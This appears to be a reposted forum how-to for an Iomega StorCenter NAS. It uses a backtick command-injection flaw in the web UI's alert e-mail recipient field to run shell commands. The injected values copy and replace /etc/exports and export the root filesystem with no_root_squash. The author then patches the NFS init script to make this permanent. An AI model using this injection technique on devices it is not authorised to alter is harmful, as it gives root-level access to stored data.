This is repost from iomega forums – approved by iomega somehow.
I had the same problem as many – I have to upgrade customer hard drive and for that I’ve planned to shift his 1.2TB of content to the nas and to have him run from there to minimize downtime while I’ll resize his LVM partition.
All I have for that is iomega StorCener Pro 150d NAS
As many others I’ve discovered that iomega nas exports nfs filesystems with absolutely usless options
1 |
(all_squash,insecure,anonuid=254,anongid=254) |
– I’m not planning to create appropriate users/groups on the nas itself – it’s going to be colossal waste of time and most likely wouldn’t help me with my problem anyway.
Now, I’ve absolutely have to give the credit the the guy who wrote this page – without his discoveries I couldn’t have gotten anywhere.
Since the software is based on GPL code I assume that modification of the scripts on my own device is legal (though I’m not entirely sure).
I didn’t plan to install special http proxy to fiddle with the web UI traffic – I just needed quick and effective solution to be able to avoid above mentioned annoyance, so I resorted to use just the “email alerts backticks vulnerability” to achieve my goal.
I will be very breif in this instruction, assuming some basic knowledge of unix/Linux, smtp,cifs,nfs,shell scripting.
Prerequisites:
- some reachable smtp server with [email protected] e-mail address, which aliased to /dev/null – you are going to send a lot of usless test e-mails there.
- Linux (or Mac?) box with samba and nfs client installed, for editing the scripts and tracking the results.
The procedure itself:
- VERY IMPORTANT – if your nas contains some important data – BACK IT UP FIRST.This modification does not affect any stored data, but as always it’s better to be safe then sorry. Also, do not attempt this on production units – any smallest typo in the commands could bring down your NAS.
You were warned – I take no responsibility of the outcome of your fiddling with your NAS software/fate of the data stored on it. - Create some user nasuser with naspassword on NAS, and allow full access to “public”.
- Mount “public” to your linux box. (something like:
1mount -t cifs -ousername=nasuser,password=nasuserpassword //nasIP/public /mnt/a
On the web ui, go to the “Shared Folder Management”, and enable NFS full access to the public (becomes /nethdd/public NFS export disk) to your linuxboxIP. - On the web ui “Alerts” configuration page, configure your smtp server info, in the e-mail recipients input line, enter
1disposable-email@yourdomain.com`cp /etc/exports /nethdd/public/`
On your mounted /mnt/a you can see nfs exports file, something like
1"/nethdd/public" linuxboxIP(rw,sync,insecure,all_squash,anonuid=254,anongid=254,no_subtree_check) - Now, we are going to modify this to allow more friendly options and we will set this friendly options to work all the time (as I found out “all_squash” is hardcoded in makecgi-pro binary, that processes web UI interaction and the only way to modify exports options is to “fix” nfs service script in /etc/init.d, but for that we have to properly nfs mount NAS device /. So, we are modifying exports file on /mnt/a, to look like this
1"/nethdd/public" linuxboxIP......
^^^^^^^^^^^^^-no changes here, and adding the line
1/ linuxboxIP(rw,sync,no_root_squash) - Back to our trusted e-mail “Alerts” configuration, E-mail now the recipients line has to look like this:
1disposable-email@yourdomain.com`cp /nethdd/public/exports /etc/;/etc/init.d/nfs restart >/tmp/rez 2>&1 &`
and click “Send test mail” button. - You should be able to nfsmount your NAS / partition with proper options to modify the startup scripts.
mount -t nfs nasIP:/ /mnt/b
- Now you can explore and see what else you can do with the NAS system (which looks like stripped down Debian linux to me), but my goal was to improve nfs options so I just resorted to modify /etc/init.d/nfs.
Here is the diff file (wouldn’t hurt to backup the script first):
12345678910--- nfs 2010-07-04 19:13:46.465161728 +0200+++ nfs.new 2010-07-04 21:15:42.199001136 +0200@@ -10,6 +10,7 @@if < -e /etc/iomnas/auth >; then. /etc/iomnas/authif < "${nfs_enabled}" = "yes" >; then+ /bin/sed -i 's/,insecure//;s/anonuid=254,anongid=254,//;s/all_/no_root_/' /etc/exports/bin/echo "Starting NFS Server"/bin/echo "Starting Portmap"/bin/start-stop-daemon --start --exec /bin/portmap
Now, when you go to “Shared Folders Management” web ui page and modify NFS mount options, shares will have proper export options upon nfs daemon restart.
This is it. No all_squash anymore.
Now, this is just “clever hack” to make the NAS serve the specific purpose. I, personally, don’t think that Iomega did anything wrong for the nfs exports default options – just didn’t provide the way to modify these options for the NAS device usability improvement.
0 Comments.